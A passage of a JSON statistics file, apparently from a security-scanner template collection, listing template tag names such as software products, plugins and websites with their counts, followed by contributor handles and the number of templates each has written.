rtual-smartzone","count":1},{"name":"deimosc2","count":1},{"name":"buymeacoffee","count":1},{"name":"twig","count":1},{"name":"parler-archived-profile","count":1},{"name":"wp-video-gallery-free_project","count":1},{"name":"centreon","count":1},{"name":"opentouch","count":1},{"name":"forescout","count":1},{"name":"orbiteam","count":1},{"name":"inglorion","count":1},{"name":"haraj","count":1},{"name":"klog","count":1},{"name":"podcast_channels_project","count":1},{"name":"contentkeeper","count":1},{"name":"memberhero","count":1},{"name":"matamko","count":1},{"name":"neo4j","count":1},{"name":"privatekey","count":1},{"name":"dotnetcms","count":1},{"name":"mongoshake","count":1},{"name":"pippoint","count":1},{"name":"com_janews","count":1},{"name":"ptr","count":1},{"name":"vr-calendar-sync","count":1},{"name":"ampjuke","count":1},{"name":"pnpm","count":1},{"name":"multilaser","count":1},{"name":"infinitewp","count":1},{"name":"fe","count":1},{"name":"affiliates-manager","count":1},{"name":"popup-maker","count":1},{"name":"xintianqing","count":1},{"name":"flowise","count":1},{"name":"buddy","count":1},{"name":"gloriatv","count":1},{"name":"xing","count":1},{"name":"moin","count":1},{"name":"csrfguard","count":1},{"name":"secure-donation","count":1},{"name":"wmw","count":1},{"name":"serverstatus","count":1},{"name":"telecom","count":1},{"name":"awin","count":1},{"name":"zzzphp","count":1},{"name":"bower","count":1},{"name":"pinata","count":1},{"name":"webence","count":1},{"name":"audiocode","count":1},{"name":"cve2000","count":1},{"name":"bws-pdf-print","count":1},{"name":"watchmyfeed","count":1},{"name":"wget","count":1},{"name":"hangfire","count":1},{"name":"hatenablog","count":1},{"name":"macshell","count":1},{"name":"klogserver","count":1},{"name":"edms","count":1},{"name":"johnniejodelljr","count":1},{"name":"beardev","count":1},{"name":"chaty","count":1},{"name":"checklist","count":1},{"name":"machform","count":1},{"name":"webport","count":1},{"name":"tianqing","count":1},{"name":"sassy","count":1},{"name":"naija-planet","count":1},{"name":"exolis","count":1},{"name":"subtlewebinc","count":1},{"name":"kanev","count":1},{"name":"xuxueli","count":1},{"name":"alertmanager","count":1},{"name":"theme","count":1},{"name":"ncbi","count":1},{"name":"exchangerateapi","count":1},{"name":"dss","count":1},{"name":"cnvd2024","count":1},{"name":"cloudfront","count":1},{"name":"weasyl","count":1},{"name":"secudos","count":1},{"name":"notabug","count":1},{"name":"obr","count":1},{"name":"creatio","count":1},{"name":"dxplanning","count":1},{"name":"h2","count":1},{"name":"phpcs","count":1},{"name":" microsoft","count":1},{"name":"fine-art-america","count":1},{"name":"3600","count":1},{"name":"myportfolio","count":1},{"name":"ait-pro","count":1},{"name":"booking-calendar","count":1},{"name":"openmediavault","count":1},{"name":"esxi","count":1},{"name":"filetransfer","count":1},{"name":"cmstactics","count":1},{"name":"advancedcustomfields","count":1},{"name":"sphinxonline","count":1},{"name":"netrc","count":1},{"name":"moduweb","count":1},{"name":"vtiger","count":1},{"name":"olivetti","count":1},{"name":"fooplugins","count":1},{"name":"myblog","count":1},{"name":"selfcheck","count":1},{"name":"clockwatch","count":1},{"name":"panels","count":1},{"name":"powerware","count":1},{"name":"webpack","count":1},{"name":"com-property","count":1},{"name":"wp_content_source_control_project","count":1},{"name":"sync","count":1},{"name":"devto","count":1},{"name":"fiverr","count":1},{"name":"ziahamza","count":1},{"name":"ruijienetworks","count":1},{"name":"dwr","count":1},{"name":"coinlayer","count":1},{"name":"security","count":1},{"name":"podcastgenerator","count":1},{"name":"taiwanese","count":1},{"name":"askfm","count":1},{"name":"aria2","count":1},{"name":"adoptapet","count":1},{"name":"blockfrost","count":1},{"name":"jasperreport","count":1},{"name":"thedogapi","count":1},{"name":"bold-themes","count":1},{"name":"smartzone","count":1},{"name":"eos","count":1},{"name":"i-mscp","count":1},{"name":"ransomware","count":1},{"name":"cobub","count":1},{"name":"estate","count":1},{"name":"flyteconsole","count":1},{"name":"friendfinder-x","count":1},{"name":"opms","count":1},{"name":"allnet","count":1},{"name":"instagram-php-api_project","count":1},{"name":"raspberrymatic","count":1},{"name":"eyeem","count":1},{"name":"api2convert","count":1},{"name":"epweb","count":1},{"name":"rockettheme","count":1},{"name":"psql","count":1},{"name":"titool","count":1},{"name":"udraw","count":1},{"name":"title_experiments_free_project","count":1},{"name":"pluginbazaar","count":1},{"name":"n-media-woocommerce-checkout-fields","count":1},{"name":"sslmate","count":1},{"name":"serpstack","count":1},{"name":"putty","count":1},{"name":"themefusion","count":1},{"name":"combo-blocks","count":1},{"name":"bandcamp","count":1},{"name":"okidoki","count":1},{"name":"revolut","count":1},{"name":"skillshare","count":1},{"name":"3dnews","count":1},{"name":"hoobe","count":1},{"name":"wptaskforce","count":1},{"name":"tri","count":1},{"name":"chomikujpl","count":1},{"name":"teknik","count":1},{"name":"latency","count":1},{"name":"geth","count":1},{"name":"couch","count":1},{"name":"short.io","count":1},{"name":"openstreetmap","count":1},{"name":"netbeans","count":1},{"name":"adultism","count":1},{"name":"streamlabs","count":1},{"name":"mismatched","count":1},{"name":"jnews","count":1},{"name":"heroplugins","count":1},{"name":"b2evolution","count":1},{"name":"cutesoft","count":1},{"name":"arcserve","count":1},{"name":"daybyday","count":1},{"name":"voidtools","count":1},{"name":"igromania","count":1},{"name":"castel","count":1},{"name":"miniwork","count":1},{"name":"spamtitan","count":1},{"name":"utility","count":1},{"name":"routes","count":1},{"name":"weboftrust","count":1},{"name":"onelogin","count":1},{"name":"cd-action","count":1},{"name":"karma","count":1},{"name":"platformio","count":1},{"name":"bynder","count":1},{"name":"extreme","count":1},{"name":"advancedpopupcreator","count":1},{"name":"stonerssocial-mastodon-instance","count":1},{"name":"gameconnect","count":1},{"name":"kubecost","count":1},{"name":"uwumarket","count":1},{"name":"tengine","count":1},{"name":"brickset","count":1},{"name":"wp-fastest-cache","count":1},{"name":"diclosure","count":1},{"name":"zoomitir","count":1},{"name":"siebel","count":1},{"name":"nvrmini","count":1},{"name":"xvideos-models","count":1},{"name":"extplorer","count":1},{"name":"snipfeed","count":1},{"name":"dapp","count":1},{"name":"devbunch","count":1},{"name":"nginxwebui","count":1},{"name":"liftoffsoftware","count":1},{"name":"kvm","count":1},{"name":"plurk","count":1},{"name":"txjia","count":1},{"name":"historianssocial-mastodon-instance","count":1},{"name":"audiobookshelf","count":1},{"name":"alerta","count":1},{"name":"syntactics","count":1},{"name":"beego","count":1},{"name":"deployment","count":1},{"name":"zenserp","count":1},{"name":"cloudfoundry","count":1},{"name":"intelx","count":1},{"name":"login-as-customer-or-user","count":1},{"name":"rudder","count":1},{"name":"wpfastestcache","count":1},{"name":"axxon","count":1},{"name":"zebra","count":1},{"name":"vero","count":1},{"name":"cowrie","count":1},{"name":"st","count":1},{"name":"bueltge","count":1},{"name":"blocksera","count":1},{"name":"emessage","count":1},{"name":"drone","count":1},{"name":"zhihu","count":1},{"name":"mylittleadmin","count":1},{"name":"satis","count":1},{"name":"gmail","count":1},{"name":"buzzfeed","count":1},{"name":"discusselasticco","count":1},{"name":"librarything","count":1},{"name":"ssh-agent","count":1},{"name":"crunchrat","count":1},{"name":"hero-maps-pro_project","count":1},{"name":"fullhunt","count":1},{"name":"hgignore","count":1},{"name":"system","count":1},{"name":"yiiframework","count":1},{"name":"tugboat","count":1},{"name":"ap-pricing-tables-lite","count":1},{"name":"brave","count":1},{"name":"cameo","count":1},{"name":"parse","count":1},{"name":"tcsh","count":1},{"name":"bws-realty","count":1},{"name":"raygun","count":1},{"name":"webclient","count":1},{"name":"transmission","count":1},{"name":"cory_lamle","count":1},{"name":"gracemedia_media_player_project","count":1},{"name":"smashballoon","count":1},{"name":"insight","count":1},{"name":"nextgen-gallery","count":1},{"name":"zmanda","count":1},{"name":"redv","count":1},{"name":"lite","count":1},{"name":"polyglot","count":1},{"name":"totalwar","count":1},{"name":"periscope","count":1},{"name":"wpserveur","count":1},{"name":"optimizingmatters","count":1},{"name":"flowdash","count":1},{"name":"topapplb","count":1},{"name":"anti-plagiarism_project","count":1},{"name":"adlisting","count":1},{"name":"seafile","count":1},{"name":"encompass","count":1},{"name":"openpagerank","count":1},{"name":"apteka","count":1},{"name":"rake","count":1},{"name":"eis","count":1},{"name":"ipfind","count":1},{"name":"openproject","count":1},{"name":"mapstodonspace-mastodon-instance","count":1},{"name":"uservoice","count":1},{"name":"jeecg_p3_biz_chat_project","count":1},{"name":"bodybuildingcom","count":1},{"name":"h3c-imc","count":1},{"name":"greatjoomla","count":1},{"name":"redux","count":1},{"name":"powertek","count":1},{"name":"itchio","count":1},{"name":"kerio","count":1},{"name":"payroll","count":1},{"name":"ras","count":1},{"name":"wpb-show-core","count":1},{"name":"webcalendar","count":1},{"name":"doorgets","count":1},{"name":"commonsbooking","count":1},{"name":"h2c","count":1},{"name":"eleanor","count":1},{"name":"championat","count":1},{"name":"eventum_project","count":1},{"name":"elasticpot","count":1},{"name":"solman","count":1},{"name":"wpvivid","count":1},{"name":"essential-real-estate","count":1},{"name":"ultimate-member","count":1},{"name":"bitcoin","count":1},{"name":"powershell-universal","count":1},{"name":"eporner","count":1},{"name":"if_surfalert_project","count":1},{"name":"chronoengine","count":1},{"name":"viessmann","count":1},{"name":"agilecrm","count":1},{"name":"gstorage","count":1},{"name":"brafton","count":1},{"name":"attributewizardpro","count":1},{"name":"radykal","count":1},{"name":"vsphere","count":1},{"name":"chachethq","count":1},{"name":"quickcms","count":1},{"name":"jreport","count":1},{"name":"netris","count":1},{"name":"battlenet","count":1},{"name":"jinfornet","count":1},{"name":"realor","count":1},{"name":"iiop","count":1},{"name":"sefile","count":1},{"name":"backup-guard","count":1},{"name":"hookbot","count":1},{"name":"celery","count":1},{"name":"tunefind","count":1},{"name":"webedition","count":1},{"name":"greenbone","count":1},{"name":"reprise","count":1},{"name":"admanager","count":1},{"name":"arris","count":1},{"name":"harmony","count":1},{"name":"catchplugins","count":1},{"name":"cytoid","count":1},{"name":"nsenter","count":1},{"name":"openautomationsoftware","count":1},{"name":"openedx","count":1},{"name":"smartnode","count":1},{"name":"cloudera","count":1},{"name":"landrayoa","count":1},{"name":"wimkin-publicprofile","count":1},{"name":"fedora","count":1},{"name":"gecad","count":1},{"name":"thinkadmin","count":1},{"name":"brizy","count":1},{"name":"tablesome","count":1},{"name":"ogc","count":1},{"name":"simplesamlphp","count":1},{"name":"jhipster","count":1},{"name":"cracked","count":1},{"name":"turbocrm","count":1},{"name":"netgenie","count":1},{"name":"averta","count":1},{"name":"yuba","count":1},{"name":"disneyplus","count":1},{"name":"dailymotion","count":1},{"name":"keepersecurity","count":1},{"name":"bookcrossing","count":1},{"name":"struts2","count":1},{"name":"properfraction","count":1},{"name":"csv","count":1},{"name":"infoleak","count":1},{"name":"yahoo-japan-auction","count":1},{"name":"talelin","count":1},{"name":"saml","count":1},{"name":"strikingly","count":1},{"name":"webviewer","count":1},{"name":"hostuxsocial-mastodon-instance","count":1},{"name":"livemasterru","count":1},{"name":"coinapi","count":1},{"name":"aquatronica","count":1},{"name":"zedna_ebook_download_project","count":1},{"name":"ndk_steppingpack","count":1},{"name":"freehtmldesigns","count":1},{"name":"coderwall","count":1},{"name":"linktree","count":1},{"name":"kindsoft","count":1},{"name":"gmapfp","count":1},{"name":"savepage","count":1},{"name":"pdf-generator-for-wp","count":1},{"name":"serialize","count":1},{"name":"xvr","count":1},{"name":"cnet","count":1},{"name":"view","count":1},{"name":"openbb","count":1},{"name":"my-calendar","count":1},{"name":"sinema","count":1},{"name":"mehanoid","count":1},{"name":"openhab","count":1},{"name":"billquick","count":1},{"name":"overseerr","count":1},{"name":"timezone","count":1},{"name":"alchemy","count":1},{"name":"purethemes","count":1},{"name":"wpquery","count":1},{"name":"phpsec","count":1},{"name":"gnome-extensions","count":1},{"name":"jooforge","count":1},{"name":"incomcms","count":1},{"name":"passwordmanager","count":1},{"name":"omlet","count":1},{"name":"mod-jk","count":1},{"name":"ellucian","count":1},{"name":"hivemanager","count":1},{"name":"mastodon-defcon","count":1},{"name":"lean-value","count":1},{"name":"slides","count":1},{"name":"musictraveler","count":1},{"name":"marshmallow","count":1},{"name":"gimp","count":1},{"name":"insanejournal","count":1},{"name":"xray","count":1},{"name":"pupyc2","count":1},{"name":"revealjs","count":1},{"name":"nj2000","count":1},{"name":"dicoogle","count":1},{"name":"slurm","count":1},{"name":"ko-fi","count":1},{"name":"crypto","count":1},{"name":"kaswara_project","count":1},{"name":"roundupwp","count":1},{"name":"helmet_store_showroom_site_project","count":1},{"name":"earcu","count":1},{"name":"kiteworks","count":1},{"name":"esmtp","count":1},{"name":"media-server","count":1},{"name":"benjamin","count":1},{"name":"huijietong","count":1},{"name":"pirelli","count":1},{"name":"divido","count":1},{"name":"mailinspector","count":1},{"name":"ctflearn","count":1},{"name":"maillist","count":1},{"name":"distance","count":1},{"name":"interact","count":1},{"name":"meshcentral","count":1},{"name":"isg1000","count":1},{"name":"nessus","count":1},{"name":"simplerealtytheme","count":1},{"name":"wpcargo","count":1},{"name":"icearp","count":1},{"name":"patch","count":1},{"name":"istat","count":1},{"name":"x-wrt","count":1},{"name":"angularjs","count":1},{"name":"floc","count":1},{"name":"playsms","count":1},{"name":"bqe","count":1},{"name":"groupib","count":1},{"name":"jsconfig","count":1}],"authors":[{"name":"dhiyaneshdk","count":1322},{"name":"daffainfo","count":865},{"name":"dwisiswant0","count":803},{"name":"pussycat0x","count":362},{"name":"ritikchaddha","count":354},{"name":"pikpikcu","count":353},{"name":"pdteam","count":297},{"name":"princechaddha","count":269},{"name":"ricardomaia","count":232},{"name":"geeknik","count":231},{"name":"theamanrawat","count":223},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"gy741","count":158},{"name":"righettod","count":149},{"name":"rxerium","count":142},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":118},{"name":"tess","count":109},{"name":"pdresearch","count":83},{"name":"iamnoooob","count":69},{"name":"idealphase","count":66},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"rootxharsh","count":62},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"philippedelteil","count":53},{"name":"gaurang","count":42},{"name":"johnk3r","count":42},{"name":"edoardottt","count":42},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":35},{"name":"adam crosser","count":31},{"name":"luisfelipe146","count":31},{"name":"ice3man","count":29},{"name":"mastercho","count":29},{"name":"pwnhxl","count":28},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"ctflearner","count":23},{"name":"harsh","count":23},{"name":"techbrunchfr","count":23},{"name":"userdehghani","count":22},{"name":"ffffffff0x","count":22},{"name":"parthmalhotra","count":20},{"name":"kazgangap","count":19},{"name":"cckuailong","count":18},{"name":"sullo","count":18},{"name":"bhutch","count":17},{"name":"lu4nx","count":17},{"name":"shaikhyaser","count":16},{"name":"0xpugazh","count":16},{"name":"random-robbie","count":16},{"name":"sheikhrishad","count":15},{"name":"unapibageek","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"tenbird","count":14},{"name":"dogasantos","count":14},{"name":"r3dg33k","count":14},{"name":"nullfuzz","count":13},{"name":"melbadry9","count":13},{"name":"0ri2n","count":13},{"name":"elsfa7110","count":13},{"name":"theabhinavgaur","count":13},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"meme-lord","count":12},{"name":"kazet","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"random_robbie","count":10},{"name":"co5mos","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"hackergautam","count":10},{"name":"0x240x23elu","count":10},{"name":"alph4byt3","count":10},{"name":"emadshanab","count":9},{"name":"adamcrosser","count":9},{"name":"momika233","count":9},{"name":"oppsec","count":9},{"name":"olearycrew","count":9},{"name":"initstring","count":9},{"name":"fabaff","count":9},{"name":"veshraj","count":8},{"name":"irshad ahamed","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"_0xf4n9x_","count":8},{"name":"zh","count":8},{"name":"noraj","count":8},{"name":"kophjager007","count":7},{"name":"nodauf","count":7},{"name":"huta0","count":7},{"name":"leovalcante","count":7},{"name":"techryptic (@tech)","count":7},{"name":"amit-jd","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"dr_set","count":7},{"name":"tarunkoyalwar","count":7},{"name":"caspergn","count":7},{"name":"harshbothra_","count":7},{"name":"its0x08","count":7},{"name":"randomstr1ng","count":7},{"name":"divya_mudgal","count":7},{"name":"clem9669","count":6},{"name":"xelkomy","count":6},{"name":"pathtaga","count":6},{"name":"byt3bl33d3r","count":6},{"name":"imnightmaree","count":6},{"name":"devang-solanki","count":6},{"name":"megamansec","count":6},{"name":"ja1sh","count":6},{"name":"evan rubinstein","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"__fazal","count":6},{"name":"lucky0x0d","count":6},{"name":"forgedhallpass","count":6},{"name":"puzzlepeaches","count":6},{"name":"gitlab red team","count":6},{"name":"justaacat","count":6},{"name":"pentest_swissky","count":6},{"name":"hahwul","count":6},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"arm!tage","count":5},{"name":"s0obi","count":5},{"name":"r3naissance","count":5},{"name":"your3cho","count":5},{"name":"powerexploit","count":5},{"name":"podalirius","count":5},{"name":"prajiteshsingh","count":5},{"name":"joanbono","count":5},{"name":"pulsesecurity.co.nz","count":5},{"name":"gtrrnr","count":5},{"name":"yanyun","count":5},{"name":"kh4sh3i","count":5},{"name":"robotshell","count":5},{"name":"mr-xn","count":5},{"name":"r12w4n","count":5},{"name":"vicrack","count":5},{"name":"defr0ggy","count":5},{"name":"andreluna","count":5},{"name":"shine","count":5},{"name":"king-alexander","count":4},{"name":"iamnooob","count":4},{"name":"xxcdd","count":4},{"name":"dolev farhi","count":4},{"name":"3th1c_yuk1","count":4},{"name":"flx","count":4},{"name":"heeress","count":4},{"name":"tanq16","count":4},{"name":"e_schultze_","count":4},{"name":"scent2d","count":4},{"name":"ggranjus","count":4},{"name":"cookiehanhoan","count":4},{"name":"wisnupramoedya","count":4},{"name":"nybble04","count":4},{"name":"ice3man543","count":4},{"name":"h1ei1","count":4},{"name":"dadevel","count":4},{"name":"m4lwhere","count":4},{"name":"incogbyte","count":4},{"name":"lum8rjack","count":4},{"name":"0xr2r","count":4},{"name":"shankar acharya","count":4},{"name":"k0pak4","count":4},{"name":"jpg0mez","count":4},{"name":"alifathi-h1","count":3},{"name":"0w4ys","count":3},{"name":"arcc","count":3},{"name":"fyoorer","count":3},{"name":"shifacyclewala","count":3},{"name":"me9187","count":3},{"name":"coldfish","count":3},{"name":"parth","count":3},{"name":"fxploit","count":3},{"name":"e1a","count":3},{"name":"huowuzhao","count":3},{"name":"badboycxcc","count":3},{"name":"true13","count":3},{"name":"imjust0","count":3},{"name":"z3bd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"whoever","count":3},{"name":"f1tz","count":3},{"name":"evergreencartoons","count":3},{"name":"andydoering","count":3},{"name":"ekrause","count":3},{"name":"cheesymoon","count":3},{"name":"bernardofsr","count":3},{"name":"dr0pd34d","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"salts","count":3},{"name":"jarijaas","count":3},{"name":"_generic_human_","count":3},{"name":"splint3r7","count":3},{"name":"lark-lab","count":3},{"name":"skeltavik","count":3},{"name":"c4sper0","count":3},{"name":"davidmckennirey","count":3},{"name":"farish","count":3},{"name":"taielab","count":3},{"name":"ph33r","count":3},{"name":"vsh00t","count":3},{"name":"vagnerd","count":3},{"name":"randomrobbie","count":3},{"name":"xianke","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"thomas_from_offensity","count":3},{"name":"atomiczsec","count":3},{"name":"lucasljm2001","count":3},{"name":"matt galligan","count":3},{"name":"omranisecurity","count":3},{"name":"sushantkamble","count":3},{"name":"swissky","count":3},{"name":"binaryfigments","count":3},{"name":"j3ssie","count":3},{"name":"mavericknerd","count":3},{"name":"ambassify","count":3},{"name":"emenalf","count":3},{"name":"aringo","count":3},{"name":"johnjhacking","count":3},{"name":"canberbamber","count":3},{"name":"isacaya","count":3},{"name":"dudez","count":3},{"name":"gevakun","count":2},{"name":"martincodes-de","count":2},{"name":"c3l3si4n","count":2},{"name":"clarkvoss","count":2},{"name":"0xrudra","count":2},{"name":"wa1tf0rme","count":2},{"name":"supras","count":2},{"name":"mohammedsaneem","count":2},{"name":"dogancanbakir","count":2},{"name":"y4er","count":2},{"name":"kre80r","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"brucelsone","count":2},{"name":"serrapa","count":2},{"name":"supr4s","count":2},{"name":"amsda","count":2},{"name":"ajaysenr","count":2},{"name":"redteambrasil","count":2},{"name":"zy9ard3","count":2},{"name":"mrharshvardhan","count":2},{"name":"vavkamil","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"luci","count":2},{"name":"florianmaak","count":2},{"name":"joshua rogers","count":2},{"name":"kiblyn11","count":2},{"name":"sbani","count":2},{"name":"thezakman","count":2},{"name":"nvn1729","count":2},{"name":"h0j3n","count":2},{"name":"ep1csage","count":2},{"name":"dahse89","count":2},{"name":"amirhossein raeisi","count":2},{"name":"codexlynx","count":2},{"name":"6mile","count":2},{"name":"hetroublemakr","count":2},{"name":"ree4pwn","count":2},{"name":"x1m_martijn","count":2},{"name":"geekby","count":2},{"name":"gal nagli","count":2},{"name":"charles d","count":2},{"name":"securityforeveryone","count":2},{"name":"bmcel","count":2},{"name":"sinkettu","count":2},{"name":"ayadim","count":2},{"name":"uomogrande","count":2},{"name":"k11h-de","count":2},{"name":"d4vy","count":2},{"name":"zomsop82","count":2},{"name":"egemenkochisarli","count":2},{"name":"foulenzer","count":2},{"name":"joshlarsen","count":2},{"name":"kishore-hariram","count":2},{"name":"paradessia","count":2},{"name":"rafaelwdornelas","count":2},{"name":"thardt-praetorian","count":2},{"name":"randomdhiraj","count":2},{"name":"korteke","count":2},{"name":"myztique","count":2},{"name":"github.com/its0x08","count":2},{"name":"raesene","count":2},{"name":"lstatro","count":2},{"name":"udit_thakkur","count":2},{"name":"paperpen","count":2},{"name":"shelled","count":2},{"name":"666asd","count":2},{"name":"n-thumann","count":2},{"name":"0xcrypto","count":2},{"name":"brenocss","count":2},{"name":"z0ne","count":2},{"name":"herry","count":2},{"name":"lotusdll","count":2},{"name":"notnotnotveg","count":2},{"name":"moritz nentwig","count":2},{"name":"usdag","count":2},{"name":"joeldeleep","count":2},{"name":"topscoder","count":2},{"name":"afaq","count":2},{"name":"convisoappsec","count":2},{"name":"bsysop","count":2},{"name":"arliya","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"v0idc0de","count":2},{"name":"mzack9999","count":2},{"name":"cocxanh","count":2},{"name":"0xelkomy","count":2},{"name":"manas_harsh","count":2},{"name":"bananabr","count":2},{"name":"hackerarpan","count":2},{"name":"pbuff07","count":2},{"name":"g4l1t0","count":2},{"name":"0xnirvana","count":2},{"name":"danielmofer","count":2},{"name":"dbrwsky","count":2},{"name":"danmcinerney","count":2},{"name":"liwermor","count":2},{"name":"koti2","count":2},{"name":"w4cky_","count":2},{"name":"bp0lr","count":2},{"name":"davidegirardi","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"shankaracharya","count":2},{"name":"cckuakilong","count":2},{"name":"nuk3s3c","count":2},{"name":"thabisocn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"msegoviag","count":2},{"name":"ehsahil","count":2},{"name":"nkxxkn","count":2},{"name":"charles d.","count":2},{"name":"sy3omda","count":2},{"name":"christianpoeschl","count":2},{"name":"8arthur","count":2},{"name":"parzival","count":2},{"name":"0xsmiley","count":2},{"name":"socketz","count":2},{"name":"streetofhackerr007","count":2},{"name":"maximus decimus","count":2},{"name":"pxmme1337","count":2},{"name":"0xsapra","count":2},{"name":"sascha brendel","count":2},{"name":"t3l3machus","count":2},{"name":"bing0o","count":2},{"name":"thevillagehacker","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whotwagner","count":1},{"name":"zandros0","count":1},{"name":"ldionmarcil","count":1},{"name":"mchklt","count":1},{"name":"ilovebinbash","count":1},{"name":"iampritam","count":1},{"name":"jonathanwalker","count":1},{"name":"nuts7","count":1},{"name":"h4sh5","count":1},{"name":"abdullahisik","count":1},{"name":"nytr0gen","count":1},{"name":"unblvr1","count":1},{"name":"rinolock","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kr1shna4garwal","count":1},{"name":"httpvoid","count":1},{"name":"kurohost","count":1},{"name":"pascalheidmann","count":1},{"name":"mr.bobo hp","count":1},{"name":"rotembar","count":1},{"name":"arall","count":1},{"name":"joaonevess","count":1},{"name":"danigoland","count":1},{"name":"qlkwej","count":1},{"name":"pry0cc","count":1},{"name":"ransomsec","count":1},{"name":"th3r4id","count":1},{"name":"b4uh0lz","count":1},{"name":"xc1ym","count":1},{"name":"kresec","count":1},{"name":"david botelho mariano","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"exid","count":1},{"name":"jacalynli","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"schniggie","count":1},{"name":"jna1","count":1},{"name":"noobexploiter","count":1},{"name":"mlec","count":1},{"name":"arqsz","count":1},{"name":"co0nan","count":1},{"name":"fpatrik","count":1},{"name":"0xrod","count":1},{"name":"shockwave","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"clment cruchet","count":1},{"name":"breno_css","count":1},{"name":"hardik-rathod","count":1},{"name":"0xtavian","count":1},{"name":"puben","count":1},{"name":"lrtk-coder","count":1},{"name":"nerrorsec","count":1},{"name":"yiran","count":1},{"name":"jas37","count":1},{"name":"pdp","count":1},{"name":"shiva (strobes security)","count":1},{"name":"jaimin gondaliya","count":1},{"name":"akokonunes","count":1},{"name":"gpiechnik2","count":1},{"name":"retr02332","count":1},{"name":"failopen","count":1},{"name":"mass0ma","count":1},{"name":"mukundbhuva","count":1},{"name":"mayank_pandey01","count":1},{"name":"berkdusunur","count":1},{"name":"soyelmago","count":1},{"name":"couskito","count":1},{"name":"jteles","count":1},{"name":"furkansayim","count":1},{"name":"osamahamad","count":1},{"name":"lbb","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"justmumu","count":1},{"name":"jeya seelan","count":1},{"name":"0xceba","count":1},{"name":"mantissts","count":1},{"name":"aaronchen0","count":1},{"name":"apt-mirror","count":1},{"name":"freakyclown","count":1},{"name":"vzamanillo","count":1},{"name":"igibanez","count":1},{"name":"shreyapohekar","count":1},{"name":"sinsinology","count":1},{"name":"metascan","count":1},{"name":"udyz","count":1},{"name":"abbas.heybati","count":1},{"name":"tea","count":1},{"name":"tirtha","count":1},{"name":"bjhulst","count":1},{"name":"jiheon-dev","count":1},{"name":"amanrawat","count":1},{"name":"jbertman","count":1},{"name":"viniciuspereiras","count":1},{"name":"nagli","count":1},{"name":"toufik-airane","count":1},{"name":"jc175","count":1},{"name":"savik","count":1},{"name":"pjborah","count":1},{"name":"ramondunker","count":1},{"name":"miroslavsotak","count":1},{"name":"dmartyn","count":1},{"name":"bad5ect0r","count":1},{"name":"natto97","count":1},{"name":"_harleo","count":1},{"name":"hakimkt","count":1},{"name":"pussycat0","count":1},{"name":"sanineng","count":1},{"name":"millermedia","count":1},{"name":"hakluke","count":1},{"name":"alex","count":1},{"name":"ooooooo_q","count":1},{"name":"francescocarlucci","count":1},{"name":"technicaljunkie","count":1},{"name":"mesaglio","count":1},{"name":"napgh0st","count":1},{"name":"christbowel","count":1},{"name":"drewvravick","count":1},{"name":"lark lab","count":1},{"name":"un-fmunozs","count":1},{"name":"xcapri","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"sospiro","count":1},{"name":"micha3lb3n","count":1},{"name":"iphantasmic","count":1},{"name":"infosecsanyam","count":1},{"name":"carlosvieira","count":1},{"name":"majidmc2","count":1},{"name":"screamy","count":1},{"name":"rodnt","count":1},{"name":"narluin","count":1},{"name":"sherlocksecurity","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"manasmbellani","count":1},{"name":"nielsing","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"calumjelrick","count":1},{"name":"ofjaaah","count":1},{"name":"flag007","count":1},{"name":"jub0bs","count":1},{"name":"rojanrijal","count":1},{"name":"mariam tariq","count":1},{"name":"mordavid","count":1},{"name":"w8ay","count":1},{"name":"kagamigawa","count":1},{"name":"remonsec","count":1},{"name":"phillipo","count":1},{"name":"thirukrishnan","count":1},{"name":"hczdmr","count":1},{"name":"jadu101","count":1},{"name":"luqman","count":1},{"name":"d4ly","count":1},{"name":"yuansec","count":1},{"name":"zhenwarx","count":1},{"name":"manuelbua","count":1},{"name":"ahmed abou-ela","count":1},{"name":"thebinitghimire","count":1},{"name":"ling","count":1},{"name":"queencitycyber","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"amirmsafari","count":1},{"name":"ledoubletake","count":1},{"name":"0xcharan","count":1},{"name":"palanichamy_perumal","count":1},{"name":"defektive","count":1},{"name":"josecosta","count":1},{"name":"droberson","count":1},{"name":"fq_hsu","count":1},{"name":"vikas kundu","count":1},{"name":"dwbzn","count":1},{"name":"tirtha_mandal","count":1},{"name":"jfbes","count":1},{"name":"omarkurt","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"am0nt31r0","count":1},{"name":"alevsk","count":1},{"name":"xshuden","count":1},{"name":"myst7ic","count":1},{"name":"bywalks","count":1},{"name":"rubina119","count":1},{"name":"dali","count":1},{"name":"becivells","count":1},{"name":"duty_1g","count":1},{"name":"open-sec","count":1},{"name":"bartu utku 